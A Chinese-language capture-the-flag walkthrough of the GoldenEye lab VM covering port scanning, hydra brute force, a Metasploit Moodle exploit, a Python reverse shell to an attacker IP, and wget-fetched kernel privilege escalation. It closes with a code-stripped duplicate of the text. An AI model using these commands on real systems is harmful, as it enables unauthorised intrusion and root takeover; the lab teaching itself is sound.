GoldenEye靶机渗透测试教学文档

靶机环境准备

下载靶机环境：https://cloud.189.cn/t/EZfQVfa2YNnm
访问码：om4x
使用VMware启动下载的虚拟机环境

信息收集阶段

网络发现

查看本机IP信息：
```
ifconfig
```
扫描同网段存活主机：
```
nmap -sn 192.168.137.0/24
```
发现靶机IP后，进行端口扫描：
```
nmap -p- 192.168.137.32
```

详细扫描结果

发现开放端口：

80端口：HTTP服务
55006和55007端口：POP3服务（初始扫描未发现，需全端口扫描）

详细服务扫描：

nmap -p55006,55007 192.168.137.32 -sS -sV -A -T5

Web渗透

初始访问

访问80端口HTTP服务
发现登录页面，需要凭证
查看页面源码，发现terminal.js文件
从源码中解码得到密码：InvincibleHack3r
尝试用户名：boris和natalya（注意小写）

成功登录组合：

用户名：boris
密码：InvincibleHack3r

邮箱服务渗透

使用hydra爆破POP3服务：

echo -e 'boris\nnatalya' >1.txt
hydra -L 1.txt -P /usr/share/wordlists/fasttrack.txt 192.168.137.32 -s 55007 pop3

爆破结果：
- natalya的密码：bird
使用nc连接POP3服务：
```
nc 192.168.137.32 55007
```
查看邮件内容：
```
user boris
pass secret1!
list
retr 1~3
```
从natalya的邮件中获取重要信息：
- 新用户凭证：
  - 用户名：xenia
  - 密码：RCP90rulez!
- 内部域名：severnaya-station.com/gnocertdir
- 需要修改hosts文件：
```
echo "192.168.137.32 severnaya-station.com" >> /etc/hosts
```

CMS渗透

访问severnaya-station.com/gnocertdir
使用获取的凭证登录：
- 用户名：xenia
- 密码：RCP90rulez!
识别CMS信息：
- Moodle 2.2.3版本
- 使用whatweb进行指纹识别
爆破另一个用户：
- 用户名：doak
- 密码：goat
查看doak的邮箱获取更多凭证：
- 用户名：admin
- 密码：xWinter1995x!（通过图片隐写获取）

图片隐写分析

下载网页中的可疑图片：

wget http://severnaya-station.com/gnocertdir/someimage.jpg

使用工具分析：

binwalk someimage.jpg
exiftool someimage.jpg
strings someimage.jpg

从图片描述中获取base64编码信息，解码得到admin密码

漏洞利用

Moodle 2.2.3 RCE漏洞利用

漏洞信息：CVE-2013-3630

使用Metasploit框架：

msfconsole
search moodle
use exploit/unix/webapp/moodle_upload
show options
set RHOSTS 192.168.137.32
set TARGETURI /gnocertdir
set USERNAME admin
set PASSWORD xWinter1995x!
exploit

获取shell后提升交互性：

python -c 'import pty; pty.spawn("/bin/bash")'

替代方法：Python反弹shell

在Web界面找到命令执行点

使用Python反弹shell代码：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在攻击机开启监听：
```
nc -lvnp 6666
```

权限提升

检查系统信息：
```
uname -a
```

查找本地提权漏洞：

发现可利用的exp：37292

在Kali中搜索：

searchsploit 37292
cp /usr/share/exploitdb/exploits/linux/local/37292.c /tmp/

在攻击机搭建HTTP服务：
```
python -m SimpleHTTPServer 8080
```

在靶机下载并编译exp：

cd /tmp
wget http://攻击机IP:8080/37292.c
cc -o exp 37292.c
chmod +x exp
./exp

验证提权：
```
id
ls -al /root
cat /root/flag.txt
```

关键点总结

信息收集要全面，包括全端口扫描
源码分析可能泄露关键信息
服务爆破时注意用户名大小写
邮件内容常包含重要线索
图片隐写是常见的信息隐藏方式
已知漏洞利用是获取系统访问的有效途径
提权前需充分了解目标系统环境

免责声明

本教学文档仅供学习网络安全技术使用，未经授权请勿对任何计算机系统进行渗透测试。实际操作需获得目标系统所有者明确许可，违法使用造成的后果由使用者自行承担。

GoldenEye靶机渗透测试教学文档靶机环境准备下载靶机环境：https://cloud.189.cn/t/EZfQVfa2YNnm 访问码：om4x 使用VMware启动下载的虚拟机环境信息收集阶段网络发现查看本机IP信息：扫描同网段存活主机：发现靶机IP后，进行端口扫描：详细扫描结果发现开放端口： 80端口：HTTP服务 55006和55007端口：POP3服务（初始扫描未发现，需全端口扫描）详细服务扫描： Web渗透初始访问访问80端口HTTP服务发现登录页面，需要凭证查看页面源码，发现terminal.js文件从源码中解码得到密码： InvincibleHack3r 尝试用户名： boris 和 natalya （注意小写）成功登录组合：用户名： boris 密码： InvincibleHack3r 邮箱服务渗透使用hydra爆破POP3服务：爆破结果： natalya的密码： bird 使用nc连接POP3服务：查看邮件内容：从natalya的邮件中获取重要信息：新用户凭证：用户名： xenia 密码： RCP90rulez! 内部域名： severnaya-station.com/gnocertdir 需要修改hosts文件： CMS渗透访问 severnaya-station.com/gnocertdir 使用获取的凭证登录：用户名： xenia 密码： RCP90rulez! 识别CMS信息： Moodle 2.2.3版本使用whatweb进行指纹识别爆破另一个用户：用户名： doak 密码： goat 查看doak的邮箱获取更多凭证：用户名： admin 密码： xWinter1995x! （通过图片隐写获取）图片隐写分析下载网页中的可疑图片：使用工具分析：从图片描述中获取base64编码信息，解码得到admin密码漏洞利用 Moodle 2.2.3 RCE漏洞利用漏洞信息：CVE-2013-3630 使用Metasploit框架：获取shell后提升交互性：替代方法：Python反弹shell 在Web界面找到命令执行点使用Python反弹shell代码：在攻击机开启监听：权限提升检查系统信息：查找本地提权漏洞：发现可利用的exp：37292 在Kali中搜索：在攻击机搭建HTTP服务：在靶机下载并编译exp：验证提权：关键点总结信息收集要全面，包括全端口扫描源码分析可能泄露关键信息服务爆破时注意用户名大小写邮件内容常包含重要线索图片隐写是常见的信息隐藏方式已知漏洞利用是获取系统访问的有效途径提权前需充分了解目标系统环境免责声明本教学文档仅供学习网络安全技术使用，未经授权请勿对任何计算机系统进行渗透测试。实际操作需获得目标系统所有者明确许可，违法使用造成的后果由使用者自行承担。